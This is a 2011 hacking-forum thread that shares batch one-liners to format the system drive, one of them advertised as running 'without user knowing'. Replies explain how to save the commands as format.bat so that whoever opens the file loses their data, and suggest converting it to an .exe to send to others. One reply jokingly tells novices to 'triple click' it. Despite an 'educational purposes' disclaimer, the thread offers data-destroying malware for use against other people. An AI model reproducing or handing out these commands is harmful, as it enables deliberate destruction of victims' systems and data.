![]() |
|
[Batch]Format The Computer - Printable Version +- Sinisterly (https://sinister.ly) +-- Forum: Coding (https://sinister.ly/Forum-Coding) +--- Forum: Coding (https://sinister.ly/Forum-Coding--71) +--- Thread: [Batch]Format The Computer (/Thread-Batch-Format-The-Computer) |
[Batch]Format The Computer - 1234hotmaster - 03-30-2011 WARNING: Do not use this on your or other people's computers. I'm not responsible for any action you do with this nor is this website. This is for educational purposes only! If you don't agree close this page and return to your home page immediately.
Format With User Knowing ( Fast Speed ): Spoiler: CodeCode: Format %systemdrive% /AUTOTEST /XFormat Without User Knowing ( Slow Speed ): Spoiler: CodeCode: Format %systemdrive% /Q /XPlease don't leech thank you ![]() RE: [Batch]Format The Computer - syabrembo - 03-30-2011 nice one mate,thnx ^_-- RE: [Batch]Format The Computer - FunKx - 03-30-2011 Ok, then what do we suppose to do with it, if not to test it on our or other computer? ![]() Just see the code?
RE: [Batch]Format The Computer - 1llusion - 03-30-2011 (03-30-2011, 04:11 PM)FunKx Wrote: Ok, then what do we suppose to do with it, if not to test it on our or other computer? learn from the code its useful in case some noob tries to hack you with his L33T V1RUS (actually, funnier is to convert it to .exe and sending it back to him, done this few times )
RE: [Batch]Format The Computer - Shadow Hunter - 03-31-2011 create a notepad and copy paste the code in it.then save it as format.bat . work done whoever double clicks it his system will get formatted. RE: [Batch]Format The Computer - mikahlamka - 04-01-2011 (03-31-2011, 01:57 PM)shadow hunter Wrote: create a notepad and copy paste the code in it.then save it as format.bat . work done whoever double clicks it his system will get formatted. thank for teaching how to do it!:thumbs: RE: [Batch]Format The Computer - pal62 - 04-02-2011 This is good info to use when I need it...thanks RE: [Batch]Format The Computer - Enc0de - 04-05-2011 (03-30-2011, 04:11 PM)FunKx Wrote: Ok, then what do we suppose to do with it, if not to test it on our or other computer? LMFAO @ FunKx To all noobs who want to test if this actually workes DO NOT DOUBLE CLICK IT. MAKE SURE YOU TRIPLE CLICK IT. RE: [Batch]Format The Computer - ayya6645 - 04-14-2011 good work bro.. thnx |